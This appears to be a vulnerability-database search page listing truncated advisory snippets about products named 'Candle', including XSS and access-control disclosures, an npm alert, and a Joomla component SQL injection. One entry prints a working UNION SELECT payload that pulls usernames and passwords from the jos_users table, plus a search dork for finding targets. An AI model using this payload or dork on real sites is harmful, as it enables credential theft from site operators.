candle-farm.de Improper Access Control vulnerability OBB-3818078

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

@bobliao/candle-view (>=0.1.4 <=0.3.8) potentially affected by unknown CVE via plugin-bugfix-v8-spread-parameters-in-optional-chaining (=0.0.1-security)

plugin-bugfix-v8-spread-parameters-in-optional-chaining NPM version =0.0.1-security is affected by a known vulnerability. The following packages have a transitive dependency on plugin-bugfix-v8-spread-parameters-in-optional-chaining and may be impacted: - @bobliao/candle-view =0.1.4, =0.3.8 Sourc...

Internet of Things Candle

There's a Kickstarter for an actual candle, with real fire, that you can control over the Internet. What could possibly go wrong?...

Candle - Customized SSL, Dangerous filesystem permissions, Exported ContentProvider vulnerabilities

HackApp vulnerability scanner discovered that application Candle published at the 'play' market has multiple vulnerabilities...

Unfixed XSS vulnerability at www.discountcandleshop.com

Security researcher jath, has submitted on 09/07/2010 a cross-site-scripting XSS vulnerability affecting www.discountcandleshop.com, which at the time of submission ranked 381283 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 09/07/2010. It is...

Joomla!/Mambo 'Candle' 'cid' SQL注入漏洞

BUGTRAQ ID: 28174 CNCAN ID:CNCAN-2008031106 Joomla!/Mambo 'Candle'是一款基于PHP的WEB应用程序。 Joomla!/Mambo 'Candle'不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞进行SQL注入攻击，可获得敏感信息或操作数据库。 问题是由于脚本对用户提交的'cid'参数处理缺少充分过滤，提交恶意SQL查询作为参数数据，可更改原来的SQL逻辑，获得敏感信息或操作数据库。 Son Vu Candle 1.0 目前没有详细解决方案提供： http://www.joomla.org/...

Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability

No description provided by source. JOOMLA comcandle SQL Injectioncid AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 MAiL : [email protected] DORK 1 : allinurl:"comcandle" EXPLOIT :...

Joomla! Component Candle 1.0 - &#039;cid&#039; SQL Injection

JOOMLA comcandle SQL Injectioncid AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 MAiL : [email protected] DORK 1 : allinurl:"comcandle" EXPLOIT : index.php?option=comcandle&task=content&cID=-9999//union//select//0x3a,username,0x3a,password,0x3a,0x3a//from//josusers/ S@BU...

Joomla Component Candle 1.0 (cID) SQL Injection Vulnerability

Exploit for unknown platform in category web applications ============================================================= Joomla Component Candle 1.0 cID SQL Injection Vulnerability ============================================================= JOOMLA comcandle SQL Injectioncid DORK 1 :...

Joomla! Component Candle 1.0 - cid SQL Injection

Joomla! Component Candle 1.0 - cid SQL Injection JOOMLA comcandle SQL Injectioncid AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 MAiL : [email protected] DORK 1 : allinurl:"comcandle" EXPLOIT :...